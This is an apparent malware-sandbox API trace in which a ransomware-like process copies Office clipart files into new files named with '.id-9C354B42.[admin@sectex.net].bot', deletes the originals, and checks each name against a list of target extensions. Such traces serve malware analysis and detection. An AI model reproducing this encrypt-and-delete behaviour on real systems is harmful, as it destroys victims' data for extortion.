	[0144.209] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0144.209] GetLastError () returned 0x0
	[0144.209] ReadFile (in: hFile=0x3c0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x8b2, lpOverlapped=0x0) returned 1
	[0144.321] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x8c0, lpOverlapped=0x0) returned 1
	[0144.321] ReadFile (in: hFile=0x3c0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.322] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.322] SetEndOfFile (hFile=0x31c) returned 1
	[0144.322] CloseHandle (hObject=0x31c) returned 1
	[0144.322] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.322] SetEndOfFile (hFile=0x3c0) returned 1
	[0144.324] CloseHandle (hObject=0x3c0) returned 1
	[0144.324] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.352] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf")) returned 1
	[0144.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63
	[0144.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63
	[0144.352] lstrlenW (lpString=".doc") returned 4
	[0144.352] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.352] lstrlenW (lpString=".docx") returned 5
	[0144.352] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.352] lstrlenW (lpString=".pdf") returned 4
	[0144.352] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.352] lstrlenW (lpString=".xls") returned 4
	[0144.352] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.352] lstrlenW (lpString=".xlsx") returned 5
	[0144.352] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.352] lstrlenW (lpString=".ppt") returned 4
	[0144.352] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63
	[0144.352] lstrlenW (lpString=".zip") returned 4
	[0144.352] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.352] lstrlenW (lpString=".rar") returned 4
	[0144.352] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.352] lstrlenW (lpString=".bz2") returned 4
	[0144.353] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.353] lstrlenW (lpString=".7z") returned 3
	[0144.353] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.353] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63
	[0144.353] lstrlenW (lpString=".dbf") returned 4
	[0144.353] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.353] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63
	[0144.353] lstrlenW (lpString=".1cd") returned 4
	[0144.353] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.353] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63
	[0144.353] lstrlenW (lpString=".jpg") returned 4
	[0144.353] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.353] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63
	[0144.353] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63
	[0144.353] lstrlenW (lpString=".doc") returned 4
	[0144.353] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.353] lstrlenW (lpString=".docx") returned 5
	[0144.353] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.353] lstrlenW (lpString=".pdf") returned 4
	[0144.353] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.353] lstrlenW (lpString=".xls") returned 4
	[0144.353] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.353] lstrlenW (lpString=".xlsx") returned 5
	[0144.353] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.353] lstrlenW (lpString=".ppt") returned 4
	[0144.353] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.353] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63
	[0144.353] lstrlenW (lpString=".zip") returned 4
	[0144.353] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.353] lstrlenW (lpString=".rar") returned 4
	[0144.353] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.353] lstrlenW (lpString=".bz2") returned 4
	[0144.354] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.354] lstrlenW (lpString=".7z") returned 3
	[0144.354] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63
	[0144.354] lstrlenW (lpString=".dbf") returned 4
	[0144.354] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63
	[0144.354] lstrlenW (lpString=".1cd") returned 4
	[0144.354] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63
	[0144.354] lstrlenW (lpString=".jpg") returned 4
	[0144.354] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.354] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.354] lstrlenW (lpString="DD01145_.WMF") returned 12
	[0144.354] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01145_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0144.355] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=2780) returned 1
	[0144.355] CloseHandle (hObject=0x38c) returned 1
	[0144.355] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01145_.wmf")) returned 0x20
	[0144.355] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01145_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.355] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01145_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0144.355] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.355] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.355] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01145_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0144.356] GetLastError () returned 0x0
	[0144.356] ReadFile (in: hFile=0x38c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0xadc, lpOverlapped=0x0) returned 1
	[0144.382] WriteFile (in: hFile=0x384, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xae0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xae0, lpOverlapped=0x0) returned 1
	[0144.383] ReadFile (in: hFile=0x38c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.383] WriteFile (in: hFile=0x384, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.383] SetEndOfFile (hFile=0x384) returned 1
	[0144.383] CloseHandle (hObject=0x384) returned 1
	[0144.383] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.383] SetEndOfFile (hFile=0x38c) returned 1
	[0144.386] CloseHandle (hObject=0x38c) returned 1
	[0144.386] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.485] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01145_.wmf")) returned 1
	[0144.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63
	[0144.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63
	[0144.485] lstrlenW (lpString=".doc") returned 4
	[0144.485] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.485] lstrlenW (lpString=".docx") returned 5
	[0144.485] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.485] lstrlenW (lpString=".pdf") returned 4
	[0144.485] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.485] lstrlenW (lpString=".xls") returned 4
	[0144.485] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.485] lstrlenW (lpString=".xlsx") returned 5
	[0144.485] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.485] lstrlenW (lpString=".ppt") returned 4
	[0144.486] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63
	[0144.486] lstrlenW (lpString=".zip") returned 4
	[0144.486] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.486] lstrlenW (lpString=".rar") returned 4
	[0144.486] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.486] lstrlenW (lpString=".bz2") returned 4
	[0144.486] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.486] lstrlenW (lpString=".7z") returned 3
	[0144.486] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63
	[0144.486] lstrlenW (lpString=".dbf") returned 4
	[0144.486] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63
	[0144.486] lstrlenW (lpString=".1cd") returned 4
	[0144.486] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63
	[0144.486] lstrlenW (lpString=".jpg") returned 4
	[0144.486] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63
	[0144.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63
	[0144.486] lstrlenW (lpString=".doc") returned 4
	[0144.486] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.486] lstrlenW (lpString=".docx") returned 5
	[0144.486] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.486] lstrlenW (lpString=".pdf") returned 4
	[0144.486] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.486] lstrlenW (lpString=".xls") returned 4
	[0144.486] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.486] lstrlenW (lpString=".xlsx") returned 5
	[0144.486] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.486] lstrlenW (lpString=".ppt") returned 4
	[0144.486] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63
	[0144.487] lstrlenW (lpString=".zip") returned 4
	[0144.487] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.487] lstrlenW (lpString=".rar") returned 4
	[0144.487] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.487] lstrlenW (lpString=".bz2") returned 4
	[0144.487] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.487] lstrlenW (lpString=".7z") returned 3
	[0144.487] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63
	[0144.487] lstrlenW (lpString=".dbf") returned 4
	[0144.487] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63
	[0144.487] lstrlenW (lpString=".1cd") returned 4
	[0144.487] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63
	[0144.487] lstrlenW (lpString=".jpg") returned 4
	[0144.487] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.487] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.487] lstrlenW (lpString="DD01152_.WMF") returned 12
	[0144.487] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01152_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0144.488] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=2960) returned 1
	[0144.488] CloseHandle (hObject=0x25c) returned 1
	[0144.488] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01152_.wmf")) returned 0x20
	[0144.488] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01152_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.488] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01152_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0144.488] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.488] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.488] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01152_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0144.489] GetLastError () returned 0x0
	[0144.489] ReadFile (in: hFile=0x25c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0xb90, lpOverlapped=0x0) returned 1
	[0144.515] WriteFile (in: hFile=0x398, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xba0, lpOverlapped=0x0) returned 1
	[0144.516] ReadFile (in: hFile=0x25c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.516] WriteFile (in: hFile=0x398, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.516] SetEndOfFile (hFile=0x398) returned 1
	[0144.516] CloseHandle (hObject=0x398) returned 1
	[0144.516] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.516] SetEndOfFile (hFile=0x25c) returned 1
	[0144.519] CloseHandle (hObject=0x25c) returned 1
	[0144.519] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.587] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01152_.wmf")) returned 1
	[0144.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63
	[0144.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63
	[0144.599] lstrlenW (lpString=".doc") returned 4
	[0144.599] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.599] lstrlenW (lpString=".docx") returned 5
	[0144.599] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.599] lstrlenW (lpString=".pdf") returned 4
	[0144.599] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.599] lstrlenW (lpString=".xls") returned 4
	[0144.599] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.599] lstrlenW (lpString=".xlsx") returned 5
	[0144.599] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.600] lstrlenW (lpString=".ppt") returned 4
	[0144.600] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63
	[0144.600] lstrlenW (lpString=".zip") returned 4
	[0144.600] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.600] lstrlenW (lpString=".rar") returned 4
	[0144.600] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.600] lstrlenW (lpString=".bz2") returned 4
	[0144.600] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.600] lstrlenW (lpString=".7z") returned 3
	[0144.600] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63
	[0144.600] lstrlenW (lpString=".dbf") returned 4
	[0144.600] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63
	[0144.600] lstrlenW (lpString=".1cd") returned 4
	[0144.600] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63
	[0144.600] lstrlenW (lpString=".jpg") returned 4
	[0144.600] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63
	[0144.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63
	[0144.600] lstrlenW (lpString=".doc") returned 4
	[0144.600] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.600] lstrlenW (lpString=".docx") returned 5
	[0144.600] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.600] lstrlenW (lpString=".pdf") returned 4
	[0144.600] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.600] lstrlenW (lpString=".xls") returned 4
	[0144.600] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.600] lstrlenW (lpString=".xlsx") returned 5
	[0144.600] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.601] lstrlenW (lpString=".ppt") returned 4
	[0144.601] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63
	[0144.601] lstrlenW (lpString=".zip") returned 4
	[0144.601] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.601] lstrlenW (lpString=".rar") returned 4
	[0144.601] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.601] lstrlenW (lpString=".bz2") returned 4
	[0144.601] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.601] lstrlenW (lpString=".7z") returned 3
	[0144.601] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63
	[0144.601] lstrlenW (lpString=".dbf") returned 4
	[0144.601] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63
	[0144.601] lstrlenW (lpString=".1cd") returned 4
	[0144.601] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63
	[0144.601] lstrlenW (lpString=".jpg") returned 4
	[0144.601] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.601] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.601] lstrlenW (lpString="DD01167_.WMF") returned 12
	[0144.601] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01167_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0144.602] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=2080) returned 1
	[0144.602] CloseHandle (hObject=0x31c) returned 1
	[0144.602] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01167_.wmf")) returned 0x20
	[0144.602] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01167_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.602] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01167_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0144.602] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.602] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
